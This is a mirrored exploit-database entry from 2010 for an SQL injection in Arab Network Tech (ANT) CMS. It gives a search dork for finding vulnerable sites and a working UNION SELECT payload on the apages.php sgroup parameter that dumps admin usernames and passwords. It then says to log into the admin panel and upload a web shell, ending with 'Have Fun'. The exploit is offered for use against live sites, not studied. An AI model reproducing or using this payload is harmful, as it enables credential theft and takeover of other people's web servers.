Arab Network Tech. (ANT) CMS – SQL Injection - 体验盒子

作者： Tr0y-x

日期： 2010-02-06

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11339/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection

Author : Tr0y-x

Script Site : www.antpage.com<http://www.antpage.com/>

Version : All Versions

Tested on : Windows & Linux

Dork : inurl:apages.php

My home : WwW.SeC-WaR.CoM<http://www.sec-war.com/>

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

=====================================Exploit===============

=========================

www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>]

Example

www.[Server}.com/[Path]/apages.php?sgroup<http://www.[server%7d.com/[Path]/apages.php?sgroup>=-

10+UniOn+AlL+SeLeCt+1,2,concat

(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins--

Then Go to Admin panel Default www.[Server}.com/<http://www.[server%7d.com/>

[Path]/admin

And Upload Shell xD

Have Fun :D

===========================================================

=========================

Greetz to : Alnjm33 - Predator - xXx - XR57 - Ahmadso -

Black_Angle & All Sec-War Members